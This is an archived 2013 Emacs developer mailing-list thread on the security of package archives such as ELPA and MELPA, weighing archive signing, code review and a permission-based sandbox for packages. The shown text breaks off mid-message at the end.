Discussion:
security of the emacs package system, elpa, melpa and marmalade
Matthias Dahl
2013-09-23 07:30:35 UTC
Permalink
Hello @all,

I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.

As it stands, most Emacs users I guess install quite a few packages from
various sources (git repo, elpa, melpa, ...) to mold Emacs to their very
specific needs and workflow. The same naturally goes for me.

Right now, the only way to make sure there is no malicious code hidden
in those packages, is to check each one manually during the initial
installation as well as for each update... which can be a very time
intensive task and not every person using Emacs is a Elisp guru and can
really spot each malicious code fragment. Especially since more and more
newer projects recommend installing their package through the package
management system (especially MELPA) which makes it even more easy to
install something without checking it first.

Signed packages on the package server (e.g. ELPA) make sense, if said
process is done externally and a security check is performed on the
package in question before signing. For MELPA this is an even harder
problem to solve, since it is fully automated and thus even signing the
package is out of the question since it would not add much of a value.

Nevertheless, I think this is a serious problem and a security incident
waiting to happen... it is just a matter of time, imho.

The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness). Unfortunately, I see this as something that needs
annual financial funding and hard for the Emacs community to achieve. I
might be wrong - and I'd like to be, honestly.

So, I'd like to propose the following as at least some measure of
protection and a first step in making the package system more secure: A
package gets a security context which details its very own permissions
just like e.g. an Android app. That context is permanent, meaning that
if a user action enters package 1 with a narrow permission set which in
turn utilizes some functions of a package 2 (which has a rather wide
permission set), only the original narrow permission set will be applied
and available. This makes the implementation easier and the system more
robust against possible workaround/exploits, imho.

There are a lot of packages that don't need access to the filesystem,
network and other security sensitive areas. If a package got hacked that
did not have those permissions in the first place, Emacs could detect a
violation, inform the user and end the execution.

Naturally, this also implies that the defined permissions should only be
alterable on the package server through an authoritative person and not
by the package itself. Also, if permissions changed, the user would
be informed by Emacs and ask for permission.

This would need a lot more detailing like what kind of permissions
should be defined (granularity, ...) and how. I'm just throwing my
thoughts into the community hive mind, very much hoping not to get
crushed fiercely. :)

Basically, all I want to achieve with this mail is to get a discussion
going about this topic which hopefully could lead to a more secure and
even better Emacs package system.

Sorry for the wall of text... and thanks for listening, um, reading. :)
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-23 14:17:33 UTC
Permalink
Post by Matthias Dahl
I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.
The current state, AFAIK is that we decided that ELPA servers should
put *.gpg signatures alongside their tarballs and other files, signed
with an "archive" key. This signature can be used to check that the
package you get indeed comes from that archive.

In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
on it).
Post by Matthias Dahl
The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness).
Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
it's usually not considered as a very major problem.

W.r.t. GNU ELPA packages, every commit installed send an email
containing the diff to a mailing-list to which some people are
subscribed, so there is a bit of review there, but it's far from
sufficient to prevent introduction of security problems.
Post by Matthias Dahl
So, I'd like to propose the following as at least some measure of
protection and a first step in making the package system more secure: A
package gets a security context which details its very own permissions
just like e.g. an Android app. That context is permanent, meaning that
Sandboxing could be an interesting direction, but it seems very
difficult: not only it'll be a non-trivial amount of implementation
work, but even just designing it will be difficult, due to the current
nature of Emacs's design where everything is global and shared.


Stefan
Matthias Dahl
2013-09-25 08:11:41 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
The current state, AFAIK is that we decided that ELPA servers should
put *.gpg signatures alongside their tarballs and other files, signed
with an "archive" key. This signature can be used to check that the
package you get indeed comes from that archive.
Which is absolutely fabulous and will make it harder to temper with
packages on one of the package repositories. Suffice to say, this won't
do anything for preventing malicious code from (a hacked) upstream
slipping through -- and this approach is not feasible for MELPA which is
becoming (afaict) more and more popular these days.
Post by Stefan Monnier
Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
it's usually not considered as a very major problem.
The situation with Debian (and any other well maintained distro) is a
bit different, imho. There are dedicated distro maintainers taking care
of their packages and some distros also have a QA procedure. There are
usually just more eyes watching and testing. Also, a lot of those
upstream projects have a team of people working on their project which
will make tempering on a decent dvcs easier to spot.

In the Emacs ecosystem, people take code from the wiki or from any of
the package repositories, knowing nothing about usually the single
person who wrote said package... especially nothing about how security
of their accounts is handled in terms of passwords, pubkeys and
whatever. So a github could get hacked, malicious code placed without
the maintainer even noticing for a very long period because he just
moved on. And so on...

Granted, those are all absolutely worst-case scenarios and one could
argue for days about how likely and relevant such incidents really are.

But apart from that, there is naturally also the other side: Security
leaks due to bad code caused simply by inexperience which could be
exploited.
Post by Stefan Monnier
Sandboxing could be an interesting direction, but it seems very
difficult: not only it'll be a non-trivial amount of implementation
work, but even just designing it will be difficult, due to the current
nature of Emacs's design where everything is global and shared.
I've been thinking about this really hard as well. And I've to admit,
I'm not (at least not yet) an Emacs/elisp expert. But not every package
needs to overwrite some core functions.

One idea thrown into discussion: We could differentiate between core and
non-core functions. This would allow the introduction of a new
permission like "re-define core function"... which naturally is like
granting a program root access.

A core function could be, imho, any function that comes bundled with
Emacs when it starts up - possibly including init.el and the user's
modifications. If the user decides to load packages on his own, we could
provide a new argument to load-file to pass a permission context in.

And naturally, to avoid any priviledge escalation, we'd only allow
permission narrowing and never widening. But I already touched that in
my last mail.

I agree, such a "sandbox" project would be quite an endeavour to take on
and would require a great deal of careful designing and implementing.

The question is this: Would there be any interest and motivation from
the current dev community to drive such an endeavour? Because otherwise
such a project would be doomed to fail, imho.

Sorry for my late reply, by the way. I am currently fighting a nasty
kind of human virus. I already tried putting my hand on the CPU and
running an anti-virus scanner which surprisingly did not work. ;-)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-25 17:00:40 UTC
Permalink
Post by Matthias Dahl
But apart from that, there is naturally also the other side: Security
leaks due to bad code caused simply by inexperience which could be
exploited.
Security problems in Emacs are everywhere, indeed. We just try to plug
the most glaring holes.
Post by Matthias Dahl
One idea thrown into discussion: We could differentiate between core and
non-core functions. This would allow the introduction of a new
permission like "re-define core function"... which naturally is like
granting a program root access.
But there's also all the never ending list of hooks, plus the dynamic
scoping, and of course, the problem of defining and tracking the
"principal" corresponding to the code currently running.

If you think for example of a typical package providing a major mode for
a programming language, the "core" functionality can be provided with
the constraint that you can "only affect the current-buffer", "only
define new functions", but it will have to be able to set buffer-local
variables and hooks and define a major mode map which might rebind
global bindings, thus tricking you potentially into running code you did
not intend.

And, it'll naturally want to provide some support for running the
compiler/interpreter for that language, so it'll require the ability to
run an external command, which of course begs the question of "how to
make sure that external command doesn't send a tarball of your home
directory to google".


Stefan
Matthias Dahl
2013-09-25 18:31:05 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually not quite the statement one wants to read _ever_ about the
software one loves to use. ;)

The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually. Especially since it is not
written in such a commong language that everyone learns during their
first years in high-school or university which implies a certain level
of interest and knowledge in programming if one decides to tackle lisp.

Regarding your examples: You are absolutely right, it is a tough problem
to solve... especially without sacrificing any freedom that everyone has
come to love about Emacs. And it would require more than just one person
trying to get this done.

Zooming out a bit: A major mode that wants to run external programs
could either define them through its permission file which would _not_
be part of its package but some properties on the package server that
can only be changed by its staff. Or Emacs could ask the user the first
time, if it is okay to execute the following programs with arguments xyz
and remember that change. All of those security relevant data should go
into a separate file naturally that Emacs protects from access, so a
plugin could not tamper with the datastore and gain priviledges that way
after a restart.

Hooks. If a security context is attached to a function (let's say
transitively through its package):

function A is running with all permissions
function A calls its hook
each hook is executed within its own security context (=> narrowing)

I'm just throwing my thoughts in the mix at this time. All this would
need a lot more thought and work, obviously. But I honestly think this
would be a goal worth pursuing since security should never be taken
lightly, imho. Nevertheless if there is zero traction from the community
such a project would be doomed to fail. And right now, we are the only
two in this discussion which could be seen as a lack of interest. :(

Don't get me wrong, I'm not complaining or trying to force something.
Just trying raise a little awareness and maybe ignite some discussion
that potentially leads to a solution that improves overall security.

Thanks Stefan by the way for taking the time. Much appreciated.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-25 22:42:27 UTC
Permalink
Hi Matthias,
Post by Matthias Dahl
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually. Especially since it is not
written in such a commong language that everyone learns during their
first years in high-school or university which implies a certain level
of interest and knowledge in programming if one decides to tackle lisp.
don't forget those out there who are not educated at all in computer
science and who picked up Lisp just because they loved Emacs. I don't
think this is such a minority, and this may explain why many security
concerns (for which you *need* to study computer science), may have
been overlooked while Emacs was progressing.

2 cents of course,
--
Bastien
Matthias Dahl
2013-09-26 09:02:41 UTC
Permalink
Hello Bastien...
Post by Bastien
don't forget those out there who are not educated at all in computer
science and who picked up Lisp just because they loved Emacs. I don't
think this is such a minority, and this may explain why many security
concerns (for which you *need* to study computer science), may have
been overlooked while Emacs was progressing.
Interesting argument. Since Lisp is not such a common language imho and
not quite so easy to learn, I never would have guessed that people
without any kind of technical background did actually choose to give
Lisp a shot just because they liked Emacs.

But actually this should not affect the core code of Emacs itself - at
all. That audience with a limited Lisp skillset should not get repo
write access in the first place and everything handed in as a patch gets
through the community review process and is commented upon. So there is
a nice learning process for the Lisp initiate and QA for the stuff that
gets into Emacs.

Or am I overlooking something here?

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-27 14:02:03 UTC
Permalink
Hi Matthias,
Post by Matthias Dahl
But actually this should not affect the core code of Emacs itself - at
all. That audience with a limited Lisp skillset should not get repo
write access in the first place and everything handed in as a patch gets
through the community review process and is commented upon. So there is
a nice learning process for the Lisp initiate and QA for the stuff that
gets into Emacs.
This is how I ended up in /etc/DEVEL.HUMOR (see at the bottom):
http://git.savannah.gnu.org/cgit/emacs.git/plain/etc/DEVEL.HUMOR?h=trunk
Post by Matthias Dahl
Or am I overlooking something here?
Not really -- given enough eyeballs, all bugs are shallow, except
those bugs that do only exist for some super-eyes out there, I guess.
--
Bastien
Matthias Dahl
2013-09-27 14:17:54 UTC
Permalink
Hello Bastien...
Post by Bastien
http://git.savannah.gnu.org/cgit/emacs.git/plain/etc/DEVEL.HUMOR?h=trunk
Did not know about that file. Nice. :-)) But you didn't get your rights
revoked, did you? (sorry for asking, I know I am nosy)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-27 14:19:36 UTC
Permalink
Post by Matthias Dahl
Did not know about that file. Nice. :-)) But you didn't get your rights
revoked, did you? (sorry for asking, I know I am nosy)
Well, the joke was that I committed this bit in DEVEL.HUMOR myself...
sorry to spoil it :)
--
Bastien
Matthias Dahl
2013-09-27 18:29:39 UTC
Permalink
Hello Bastien...
Post by Bastien
Well, the joke was that I committed this bit in DEVEL.HUMOR myself...
sorry to spoil it :)
Aaaah, now it makes sense. :-)) Thanks for clearing that up. I hope that
it wasn't too obvious for anybody else. :)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-26 01:09:42 UTC
Permalink
Post by Matthias Dahl
The question that is bugging me now: Why is that?
For the same reason it uses dynamic scoping, dynamic typing, hooks
galore, defadvice, ...
Emacs is about empowering the user.

Also it grew in a context where security was not a serious concern.
Post by Matthias Dahl
I'm just throwing my thoughts in the mix at this time. All this would
need a lot more thought and work, obviously. But I honestly think this
would be a goal worth pursuing since security should never be taken
lightly, imho.
To me, the problem it too ill-understood to be able to design a workable
solution. So I think the only way to attack the problem is to
perform experiments to get a feel for what might work and what problems
show up.


Stefan
Matthias Dahl
2013-09-26 09:02:46 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
Emacs is about empowering the user.
Sure. But all of that does not necessarily contradict security or make
the code full of security leaks / holes.
Post by Stefan Monnier
To me, the problem it too ill-understood to be able to design a workable
solution.
Agreed. It was never my intention in this discussion to find a solution,
just to start the discussion and the process that might lead to a
solution eventually down the road.
Post by Stefan Monnier
So I think the only way to attack the problem is to perform experiments
to get a feel for what might work and what problems show up.
Ah, justice. I knew this would come back to me and bite me. ;) I know
that since I am the one who started this discussion, it is expected of
me (or considered good manors) that I volunteer to do so. And I'd in all
honesty gladly jump on in... but my familiarity with the code base is
very far from sufficient for this. This is something for someone with a
very strong grasp of Elisp and Emacs, imho. :(

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Óscar Fuentes
2013-09-26 09:21:25 UTC
Permalink
Post by Matthias Dahl
Post by Stefan Monnier
Emacs is about empowering the user.
Sure. But all of that does not necessarily contradict security or make
the code full of security leaks / holes.
It is. Security, as implemented in practice, is about restricting
users/software from doing things or, at best, "informing" the users
about the implications of certain actions and asking for permission,
questions equivalent to "do you trust me?." I answered that question
once and for all the day I installed Emacs.
Stefan Monnier
2013-09-26 14:41:17 UTC
Permalink
Post by Matthias Dahl
Post by Stefan Monnier
So I think the only way to attack the problem is to perform experiments
to get a feel for what might work and what problems show up.
Ah, justice. I knew this would come back to me and bite me. ;) I know
that since I am the one who started this discussion, it is expected of
me (or considered good manors) that I volunteer to do so. And I'd in all
honesty gladly jump on in... but my familiarity with the code base is
very far from sufficient for this. This is something for someone with a
very strong grasp of Elisp and Emacs, imho. :(
I suggest you lead the charge while asking for help at the same time.
Concretely, you could do something along the following lines:
- decide some set of rules that a package should follow. Make those
*very* simple (i.e. simplistic) for now. E.g. "can only access
current-buffer".
- try to figure out a way to implement it (without regards for
efficiency, for a start).
- see how it works with existing packages.
- try to write something nasty to see if your rules are actually useful.
- iterate the process.
Post by Matthias Dahl
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard. Naturally there are holes - known and unknown. The key,
The set of people with commit access to Emacs is the same as the set of
people with commit access to GNU ELPA (includes more than a hundred
people, some of whom are not expert programmers). And both repositories
send diff-emails for every commit installed in it.

So the main difference is that many more people clone/checkout the Emacs
repository than the GNU ELPA repository.


Stefan
Matthias Dahl
2013-09-27 14:17:50 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
I suggest you lead the charge while asking for help at the same time.
In all honesty, as other have mentioned as well, this is a tough nut to
crack and requires some intimate knowledge of Emacs and Lisp internals
to get overall right.

As much as it pains my ego to say: I'm not that guy. If we were talking
about C++, Python or whatever, I would still be hesistant due to the
huge codebase of Emacs but at least those languages I know pretty darn
well with all their ins and outs. I can absolutely not say the same for
Lisp.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-27 15:47:49 UTC
Permalink
There are many different aspects in this discussion.

One is to try and come up with a technical way for Emacs's
implementation to try and prevent malicious code from harming the user
via some kind of sandboxing. While I do think we could hypothetically
come up with some kind of sandboxing that is sufficiently flexible to be
usable at least for some packages, I doubt we could make it really
effective against an attacker (i.e. I doubt we could plug all the
holes).

So such a sandboxing would mostly work as a "sanity check" which can
catch coding errors/oversights rather than malicious code.

Another way to look at the problem is to perform code review.
By default Emacs's packages.el only accesses GNU ELPA, where the code is
not extensively reviewed, but where some attempts to install malicious
code would get caught.

So you could argue that the problem is not ELPA in general but
"unsupervised" archives such as MELPA. Based on this, another approach
(one which should not require as much knowledge of Emacs subtleties as
the design and implementation of a sandboxing system) you could provide
a "safe MELPA alternative" where the changes are reviewed (to some
extent). Or maybe, just hack on MELPA directly to try and setup some
kind reviewing system.


Stefan
Richard Stallman
2013-09-28 14:15:51 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.

I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-30 15:12:56 UTC
Permalink
Hello Richard...
Post by Richard Stallman
I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
+1

But imho, this would also include ELPA because there is not really a
control process in place. A mail gets sent that some person from the
community needs to thoroughly read/check. There is no guarantee that
someone will actually do this.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Richard Stallman
2013-09-30 21:11:24 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.
Post by Richard Stallman
I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
+1

But imho, this would also include ELPA because there is not really a
control process in place. A mail gets sent that some person from the
community needs to thoroughly read/check. There is no guarantee that
someone will actually do this.

I think we should maintain ELPA with the same level of care that we
apply to code in Emacs, and sign the downloads the same way GNU
packages are signed. Then we can tell people that they shouldn't
hesitate to download packages from ELPA.
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-30 15:31:21 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
[...]
So such a sandboxing would mostly work as a "sanity check" which can
catch coding errors/oversights rather than malicious code.
After the whole discussion, I agree, that a sandbox would not be the
holy grail to this problem, unfortunately. I still think it would be one
measure that should be complemented with others and work in concert with
those to be more effective as a whole.
Post by Stefan Monnier
Another way to look at the problem is to perform code review.
Which would be very nice to have in general, naturally.
Post by Stefan Monnier
So you could argue that the problem is not ELPA in general but
"unsupervised" archives such as MELPA.
Excuse my straightforwardness but this feels like pushing responsibility
away to someone else. Neither ELPA, nor MELPA or Marmalade provide a
sufficient reviewing process to be considered effective, imho. So all of
those are more or less in the same boat. Naturally, some of the
solutions that would work for ELPA, could potentially be hard to do with
MELPA... but that is a different story.

I think a general solution that would benefit all, would be absolutely
desirable.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-09-26 01:12:56 UTC
Permalink
Post by Matthias Dahl
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually not quite the statement one wants to read _ever_ about the
software one loves to use. ;)
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually.
Then your model of security is inadequate. Software is *inherently*
insecure. Any regular behavior provides an attack surface; large
amounts of regular behavior provides a large attack surface. A single
breach of the attack surface and you lose. Interfaces between
software systems are prolific sources of weak points.

Emacs provides a huge attack surface on the individual user *because*
it is so capable, and provides interfaces to so many other software
systems. That's all there is to it.

The fact that Emacs is mostly implemented in Lisp is also a security
feature, since it wraps, rather than calls directly, the system
functions. This means that although such functions are available
(which is an attack vector), serious security breaches such as
exploiting a buffer overflow are hard to engineer, and the operating
system is likely to be able to protect itself from attacks via Lisp.

By the same token, as long as individual users have little power (for
example, not being able to bind to privileged ports), they're
generally not attractive targets for such attacks. If they are
attacked (eg, to get a privilege escalation started), the attacker
will eschew use of Emacs and head straight for the C compiler. That,
combined with the relative security of Lisp itself, means that the
incentive for Emacs developers to put in the necessary effort for a
serious security audit and a complete redesign of the Lisp
implementation is rather low.
Post by Matthias Dahl
Hooks. If a security context is attached to a function (let's say
function A is running with all permissions
function A calls its hook
each hook is executed within its own security context (=> narrowing)
*pong* Function on function-hook doesn't have permission to frob.
Allow frob? (0 = no; 1 = just this time; 2 = always; -1 = never) _

But this is really self-defeating. Since in general hooks should be
empty by default, what you're saying is that a function that the user
has probably explicitly specified and may have written herself should
run with less privilege than functions that the user is only vaguely
aware of.

For example, I don't know who's broken, but every time my "smart"
phone upgrades, I have to re-login to my employer's wireless network.
And every time, I'm told that the certificate can't be tracked to a
trusted root. Of course the phone software is very little help in
figuring out what's wrong; it just shows the certificates. I know how
to trace the transitive trust, but even so, why should I trust a
self-signed root claiming to be the Japanese Ministry of Education,
Science, and Technology's IT department? These guys don't have
sufficient clue to get a path to a universally trusted root! I also
am aware that sub-authorities have gone rogue or been hacked in the
past. But ... I enable. Wouldn't you?

Definitely my colleagues have no clue. They don't even think about it
any more, so many servers present keys for a parent domain or sister
domain. Even the CS Department (the initial entry point of the first
large-scale virus infection at my university after the virus checker
was installed on the mail gateway). Most of these guys are theorists
(including in crypto where you'd think they'd be aware -- but no,
they're not) and have zero sysadmin experience (and probably haven't
read The Cuckoo's Egg).
Post by Matthias Dahl
Don't get me wrong, I'm not complaining or trying to force something.
Just trying raise a little awareness and maybe ignite some discussion
that potentially leads to a solution that improves overall
security.
I'm sure the leadership is aware. But the basic answer is the same as
in any security context: avoid exposing regular behavior to potential
enemies, and establish a community watch on community resources.
Matthias Dahl
2013-09-26 09:02:32 UTC
Permalink
Hello Stephen...
Post by Stephen J. Turnbull
Then your model of security is inadequate. Software is *inherently*
insecure.
Agreed. But if someone says there are security leaks all over the place,
that is a different story. This implies those are tolerated for various
reasons. But they do exist and should be fixed, nevertheless.

I would _never_ consider a software secure. But if holes exist that are
known and those are not fixed, that is a different story. This does also
imply that code slips in that lacks in quality... knowingly.
Post by Stephen J. Turnbull
Emacs provides a huge attack surface on the individual user *because*
it is so capable, and provides interfaces to so many other software
systems. That's all there is to it.
Agreed. But this doesn't imply that the user should be powerless against
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard. Naturally there are holes - known and unknown. The key,
imho, is to empower the user to have more control over plugins he needs
to install. This adds a line of defense that can be built upon.

Right now there is absolutely nothing stopping a hacked plugin to do
just about anything until the community or the user somehow notices this.
Post by Stephen J. Turnbull
If they are attacked (eg, to get a privilege escalation started), the attacker
will eschew use of Emacs and head straight for the C compiler.
Emacs can "easily" be used through a malicious plugin to tamper with the
user environment and thus gain all kinds of access and data. It does not
need to really make any use of a security hole / leak.
Post by Stephen J. Turnbull
That,
combined with the relative security of Lisp itself, means that the
incentive for Emacs developers to put in the necessary effort for a
serious security audit and a complete redesign of the Lisp
implementation is rather low.
That is only half of the story, though. My concern mainly lies with the
"plugin" system. Putting some kind of defense there. And yes, in the end
this would also possibly mean to harden Emacs here and there to protect
this defense system from being tampered with.

Things are more intervened than your point of view suggests.
Post by Stephen J. Turnbull
But this is really self-defeating. Since in general hooks should be
empty by default, what you're saying is that a function that the user
has probably explicitly specified and may have written herself should
run with less privilege than functions that the user is only vaguely
aware of.
Only thoughts. I was only thinking aloud. :) Again, all of this would
need a lot more detailing and testing, obviously.

But in general, I would consider user code in the same category as core
code, thus full privileges. Now if a function with less privileges
called a hook that contains a function with required higher privileges,
that would naturally be a very valid use-case that would need further
investigation for a suitable solution.
Post by Stephen J. Turnbull
But ... I enable. Wouldn't you?
But at least you get a warning. You get information. You can make an
informed decision at that time. You do know who you are dealing with,
you can somehow at least rudimentarily assess the risks for this very
specific case.

With Emacs, you can either review each and every change for each and
every plugin you have installed - or you are completely on your own.
There are no warnings. No checks. Nothing.

To expand on your good example: This would be like you had to check the
certs all by yourself beforehand by logging in, tracing and validating
everything. If you did not do so, well, your choice... and there would
be no warning or checks. Nothing.

And not everybody uses self-signed certs, by the way. ;) Even though the
cert system is broken in several aspects, it still provides some from of
valuable clue whether a site (in the most general meaning of the term)
is most likely "trustworthy" or not.
Post by Stephen J. Turnbull
I'm sure the leadership is aware. But the basic answer is the same as
in any security context: avoid exposing regular behavior to potential
enemies, and establish a community watch on community resources.
And what would you suggest in terms of ELPA / Marmalade and MELPA and
the package system in general based on this...?

By the way, thanks for your input. It is very much appreciated.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-09-27 07:10:33 UTC
Permalink
Post by Matthias Dahl
Post by Stephen J. Turnbull
Then your model of security is inadequate. Software is *inherently*
insecure.
Agreed. But if someone says there are security leaks all over the place,
I didn't read Stefan as saying "leaks", I read him as saying "Emacs is
not designed to be your security nanny."
Post by Matthias Dahl
that is a different story. This implies those are tolerated for
various reasons.
Well, sure. A concrete block is inherently more secure against an
earthquake than a building. That doesn't mean we should replace the
latter with the former.
Post by Matthias Dahl
But they do exist and should be fixed, nevertheless.
And they are fixed, frequently. For example, "safe" and "risky" local
variables.
Post by Matthias Dahl
Agreed. But this doesn't imply that the user should be powerless against
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard.
I gather you haven't read Ken Thompson's ACM address recently.
Post by Matthias Dahl
Right now there is absolutely nothing stopping a hacked plugin to do
just about anything until the community or the user somehow notices this.
Sure. But the problem of making a sandbox is very hard. Python gave
up. Maybe the Emacs people are smarter, but the Python developers
aren't dumb.
Post by Matthias Dahl
And what would you suggest in terms of ELPA / Marmalade and MELPA and
the package system in general based on this...?
If you care, don't use them. On my exposed system, I don't install
any XEmacs packages that I don't absolutely need.
Matthias Dahl
2013-09-27 14:18:08 UTC
Permalink
Hello Stephen...
Post by Stephen J. Turnbull
I didn't read Stefan as saying "leaks", I read him as saying "Emacs is
not designed to be your security nanny."
Well, only Stefan can clarify this. But if it was the latter, even
though I do agree, it does absolutely not imply that we should keep the
doors widely open and make no effort to support the user wrt to security.
Post by Stephen J. Turnbull
Well, sure. A concrete block is inherently more secure against an
earthquake than a building. That doesn't mean we should replace the
latter with the former.
Stephen, I'm not advocating we should all drive around in an armored car
or never ever connect our computers with the evil internet or whatever.

I'm also _not_ saying or implying that we should make Emacs "secure" as
I know all too well that there is no such thing. But one can always make
a best effort.

All I am saying is: It would be very helpful if we could give the user a
few tools to handle, grasp and maybe harden certain security aspects.
And in this concrete discussion: It is all about plugins who, once they
are installed through whatever means, can also do whatever they choose.

You wouldn't work as root on your system, would you? And why should a
plugin get full rights if just needs a few infos from the local buffer?
Post by Stephen J. Turnbull
I gather you haven't read Ken Thompson's ACM address recently.
If you mean "Reflections on Trusting Trust" and to quote: "You can't
trust code that you did not totally create yourself.". If you mean that,
I fully agree.

But the reality is, we have to use software that others created. And the
open source/free software world is full of great minds and talents that
create astounding pieces of software. And those people working pouring
the time and life into those projects, usually would never place
any malicious code into their creations. It is through hacks or other
circumstances that such things happen. The world is not inherently evil.
Post by Stephen J. Turnbull
Sure. But the problem of making a sandbox is very hard. Python gave
up. Maybe the Emacs people are smarter, but the Python developers
aren't dumb.
I fully agree, again. And I'm not saying a sandbox is the best solution.
I'm after a discussion about the problem... which might even lead to a
totally unexpected solution.

I did not know that the Python devs worked on a sandbox, honestly. But
the problem here is a bit more "relaxed", imho. We are not talking about
hardening / sandboxing a language in general but only a very concrete
functionality in a specific program (which, granted, is very tightly
intervened with the language it is written in).
Post by Stephen J. Turnbull
If you care, don't use them. On my exposed system, I don't install
any XEmacs packages that I don't absolutely need.
This may reduce the risk but is this really a solution? Say you use only
the great jedi.el for your Python development. I am sure that its author
Takafumi Arakaki would never put anything harmful in it... but I can
imagine several scenarios how something harmful could end up in it
nevertheless without him noticing it for a while.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-09-27 17:31:05 UTC
Permalink
Post by Matthias Dahl
Post by Stephen J. Turnbull
Well, sure. A concrete block is inherently more secure against
an earthquake than a building. That doesn't mean we should
replace the latter with the former.
Stephen, I'm not advocating we should all drive around in an
armored car or never ever connect our computers with the evil
internet or whatever.
It's an exaggeration. See below.
Post by Matthias Dahl
All I am saying is: It would be very helpful if we could give the
user a few tools to handle, grasp and maybe harden certain security
aspects. And in this concrete discussion: It is all about plugins
who, once they are installed through whatever means, can also do
whatever they choose.
Sure. *Preventing* that is going require doing something that is
probably impossible for any program that isn't an operating system in
control of the machine.
Post by Matthias Dahl
You wouldn't work as root on your system, would you?
I do every day, to run emerge --update. ;-)
Post by Matthias Dahl
And why should a plugin get full rights if just needs a few infos
from the local buffer?
It shouldn't. But that question is not interesting and the answer
isn't controversial. The interesting question is, "why should a
plugin be denied the rights it needs when those go beyond reading the
buffer it was invoked from?"
Post by Matthias Dahl
But the reality is, we have to use software that others created. And the
open source/free software world is full of great minds and talents that
create astounding pieces of software. And those people working pouring
the time and life into those projects, usually would never place
any malicious code into their creations. It is through hacks or other
circumstances that such things happen. The world is not inherently evil.
True. The world is not. In fact, most of the bad guys aren't evil,
just willing to bend the rules a bit to get their way. Still, cracked
is cracked, and it only takes once, no matter what the ratio of
great|talented|astounding is to "warped". And that's why the issue
here is that the answer to the "interesting question" is the same one
that a mother gives to a 5-year-old: "just because". The way to get
the necessary permission in general is to ask the user each time the
program wants access.
Post by Matthias Dahl
I did not know that the Python devs worked on a sandbox, honestly.
They didn't just work on it; they had one (the restricted execution
option) and then they stopped distributing it because it didn't keep
its promises. There's been work on a better one, but IIRC it hasn't
been PEP'ed yet. And nobody except the author (who is very good, I
